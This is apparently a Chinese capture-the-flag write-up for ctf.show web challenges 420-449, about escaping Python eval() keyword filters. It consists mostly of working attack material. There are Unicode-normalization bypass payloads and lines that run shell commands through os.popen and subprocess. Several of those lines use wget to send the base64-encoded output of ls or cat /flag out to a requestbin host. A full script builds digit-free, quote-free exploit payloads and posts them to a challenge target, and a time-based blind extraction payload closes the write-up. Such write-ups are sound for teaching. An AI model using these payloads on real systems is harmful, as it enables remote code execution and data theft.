【WEB入门】420-449
hdxw
web420
ls ..
nl ../*
web421
ls
nl f*
web422
ls
nl *
web423-web433（正则只做了关键字黑名单，没有先做 NFKC 规范化：Python 解析器会把标识符按 NFKC 规范化，所以 payload 里的全角字母 ｏ、ａ 既不命中 os/open/read 的匹配，又会被还原成 __import__/popen/read，见下面的 payload 与题目源码）
?code=__imp%EF%BD%8Frt__(%27o%27%27s%27).p%EF%BD%8Fpen(%27cat /flag%27).re%EF%BD%81d()
from flask import Flask
from flask import request
import re
app = Flask(__name__)  # single-route challenge app; the only handler is app_index below
@app.route('/')
def app_index():
    """Challenge handler: eval() the ``code`` query parameter unless a denylist regex matches.

    NOTE(review): this is the vulnerable target, not a pattern to copy — eval()
    on request input is remote code execution by design here. The word-based
    denylist is bypassable in at least two ways visible on this page: Python
    NFKC-normalizes identifiers (PEP 3131), so fullwidth letters such as ｏ in
    ``__impｏrt__`` pass the regex yet still resolve to ``__import__``; and
    ``exec(request.args['c'])`` moves every forbidden word into a second
    parameter that the regex never inspects.
    """
    code = request.args.get('code')
    if not code:
        return 'where is flag?<!-- /?code -->'
    banned = re.compile(r'os|open|system|read|eval|builtins')
    if banned.search(code):
        return 'where is flag?<!-- /?code -->'
    # Arbitrary expression evaluation on attacker-controlled input.
    return eval(code)
if __name__ == '__main__':
    # Listens on every interface on port 80 — acceptable inside the challenge
    # container only; an eval()-backed handler must never be reachable beyond it.
    # Debug mode is (correctly) not enabled, so the Werkzeug debugger is not exposed.
    app.run(port=80, host='0.0.0.0')
web434-web439
没有curl，改用 wget 把命令输出（base64 后）作为 URL 参数外带到 requestbin
?code=exec(request.args[%27c%27])&c=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`ls%20/|base64`%27).read())
?code=exec(request.args[%27c%27])&c=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`cat%20/flag|base64`%27).read())
web440-web441
过滤了引号，第二个参数名用 chr(99)（即 'c'）代替字符串字面量
?code=exec(request.args[chr(99)])&c=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`cat%20/flag|base64`%27).read())
web442
过滤了数字（chr(99) 用不了），第二个参数名改用 str(None)，即 'None'
?code=exec(request.args[str(None)])&None=print(__import__(%27os%27).popen(%27wget+http%3a%2f%2frequestbin.net%2fr%2f4f26lr0j?a=`cat%20/flag|base64`%27).read())
web443
开始上脚本：思路是用 len(str(None))==4 推出 0~10 的算术表达式，把 payload 的十六进制整数写成只含 4 的加减乘表达式，再在服务端用 bytes.fromhex(hex(n)[2:]).decode() 还原并 exec，从而整个 code 参数里既无数字也无引号
import base64,requests
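# Arithmetic "digit" primitives for 0..10 written with the single digit 4, so
# that one final substitution (4 -> an expression such as len(str(None)))
# leaves the payload free of digits and quotes. Index == value. s0 really is
# zero here; the original table had len(str(None)) == 4 in that slot, which
# silently produced a wrong power of ten whenever an exponent needed s0.
DIGIT_EXPRS = [
    "(4-4)",                            # 0
    "(4//4)",                           # 1
    "(4-4//4-4//4)",                    # 2
    "(4-4//4)",                         # 3
    "4",                                # 4
    "(4*4//(4-4//4))",                  # 5
    "((4-4//4-4//4)*(4-4//4))",         # 6
    "(4*4-4-4-4//4)",                   # 7
    "(4*4-4-4)",                        # 8
    "((4-4//4)*(4-4//4))",              # 9
    "((4-4//4-4//4)*(4*4//(4-4//4)))",  # 10
]

# How the literal 4 is spelled in the final payload. web443 allows len();
# when len is banned too (web444) something like "-~-~-~-~sum([])" works.
DEFAULT_FOUR = "len(str(None))"

# Stage-1 loader: the real command arrives in ?a=, which the server-side
# filter never inspects, so it may contain digits, quotes and banned words.
PAYLOAD = """eval(request.args['a'])"""
TARGET = "http://368118f3-e935-42ad-b151-46e5b7000f89.chall.ctf.show/"
COMMAND = "print(__import__('os').popen('wget http://requestbin.net/r/4f26lr0j?a=`cat /flag|base64`').read())"


def _num_expr(n: int) -> str:
    """Express the non-negative int *n* with the symbolic tokens s0..s10.

    n <= 10 is a single token; larger values are written as (q*10) or
    ((q+1)*10 - r') so only ``*`` and ``-`` appear (the original deliberately
    avoided ``+``; this keeps that property). Recursion on the quotient makes
    the range unbounded, whereas the original could only spell 0..109 and
    mis-spelt lengths ending in 0 or 1.

    Raises ValueError for negative *n*.
    """
    if n < 0:
        raise ValueError("negative values cannot be expressed")
    if n <= 10:
        return f"s{n}"
    q, r = divmod(n, 10)
    if r == 0:
        return f"({_num_expr(q)}*s10)"
    return f"({_num_expr(q + 1)}*s10-s{10 - r})"


def _pow10_expr(exp: int) -> str:
    """``10**exp`` in s-tokens; 10**0 is simply s1."""
    return "s1" if exp == 0 else f"pow(s10,{_num_expr(exp)})"


def _symbolic_int(value: int) -> str:
    """Encode *value* as 10**L - 1 - sum((9 - d_i) * 10**i), L = digit count.

    10**L - 1 is L nines; subtracting (9 - d_i)*10**i at position i turns that
    nine into the digit d_i. Positions that already hold a 9 need no term.

    Raises ValueError for negative *value*.
    """
    if value < 0:
        raise ValueError("negative values cannot be expressed")
    digits = str(value)
    terms = [_pow10_expr(len(digits))]
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if d == 9:
            continue
        if i == 0:
            terms.append(f"-s{9 - d}")
        else:
            terms.append(f"-s{9 - d}*{_pow10_expr(i)}")
    terms.append("-s1")
    return "".join(terms)


def _resolve(expr: str, four_expr: str) -> str:
    """Substitute s10..s0 (descending so ``s1`` never clobbers ``s10``), then
    every literal 4 with ``(four_expr)``.

    str.replace does not rescan its own output, so a *four_expr* that itself
    contains digits or s-tokens is still handled correctly.
    """
    for n in range(len(DIGIT_EXPRS) - 1, -1, -1):
        expr = expr.replace(f"s{n}", DIGIT_EXPRS[n])
    return expr.replace("4", f"({four_expr})")


def encode_int(value: int, four_expr: str = DEFAULT_FOUR) -> str:
    """Return a digit-free, quote-free Python expression that evaluates to *value*."""
    return _resolve(_symbolic_int(value), four_expr)


def build_payload(source: str, four_expr: str = DEFAULT_FOUR) -> str:
    """Wrap *source* as ``exec(bytes.fromhex(hex(N)[2:]).decode())`` with N
    spelled out arithmetically, so the result contains no digits and no quotes.

    Raises ValueError for an empty *source*, or one whose first byte is below
    0x10: int() would drop the leading hex zero and hex() cannot restore it,
    which silently corrupts the first byte on the server.
    """
    hexvalue = source.encode().hex()
    if not hexvalue:
        raise ValueError("empty source")
    if hexvalue[0] == "0":
        raise ValueError("first byte < 0x10 would lose its leading hex digit")
    number = _symbolic_int(int(hexvalue, 16))
    wrapper = f"exec(bytes.fromhex(hex({number})[s2:]).decode())"
    return _resolve(wrapper, four_expr)


if __name__ == "__main__":
    code = build_payload(PAYLOAD)
    print(code)
    # `requests` is imported at the top of the file. ?a= is sent via params so
    # it is URL-encoded and the server sees COMMAND byte-for-byte.
    print(requests.post(TARGET, params={"a": COMMAND}, data={"code": code}).text)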
web444
过滤了len，改用 -~sum([]) 构造 1（sum([]) 为 0，~0 为 -1，再取负得 1），其余沿用 web443 的脚本
web445
del os.system
del os.popen
c="print(__import__('subprocess').call(['wget http://requestbin.net/r/4f26lr0j?a=`cat /flag|base64`'],shell=True))"
参考:https://www.cnblogs.com/rangger/p/9801588.html
web446
del imp.reload
不影响（脚本没用到 imp.reload），web445 的脚本继续用
web447-web449
import subprocess
del subprocess.Popen
del subprocess.call
del subprocess.run
del subprocess.getstatusoutput
del subprocess.getoutput
del subprocess.check_call
del subprocess.check_output
import timeit
del timeit.timeit
好家伙
代码同 web446，但命令执行相关的函数都被删掉了，改为基于 open('/flag') 的时间盲注：逐位比较 flag 字符，命中则 sleep(2)，按响应时间判断
print(__import__('time').sleep(2) if open('/flag').read()[%s]=='%s' else 1)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。